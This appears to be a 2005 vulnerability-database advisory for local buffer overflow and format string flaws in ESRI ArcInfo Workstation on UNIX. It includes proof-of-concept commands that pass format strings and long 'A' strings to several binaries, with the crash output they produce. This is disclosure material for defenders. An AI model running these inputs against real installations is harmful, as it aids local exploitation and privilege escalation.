exploits , vulnerabilities , articles , ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities

Title	ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
Published	2005-04-30-12:00AM
Updated	2005-05-24-02:45PM
Class	Unknown
CVE	CAN-2005-1393 CAN-2005-1394
Remote	No
Local	Yes
Credit	Discovery is credited to Kevin Finisterre.
Vulnerable	ESRI ArcInfo Workstation on UNIX 9.0 ESRI ArcInfo Workstation on UNIX 8.3
Not Vulnerable
Code	The following proof-of-concept examples were provided: -bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x -bash-2.05b$ ./wservice Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run! -bash-2.05b# export ARCHOME=%x.%x.%x.%x -bash-2.05b# ./lockmgr Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run! -bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b FATAL ERROR Segment Violation -bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a FATAL ERROR Segment Violation -bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'` FATAL ERROR Segment Violation -bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'` FATAL ERROR Segment Violation -bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a FATAL ERROR Segment Violation Exploit code was also released for the 'wservice' format string vulnrability. /data/vulnerabilities/exploits/ex_arcgis.c
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
• 2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
• 2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
• 2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
• 2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
• 2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
• 2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 08:38:50 +0000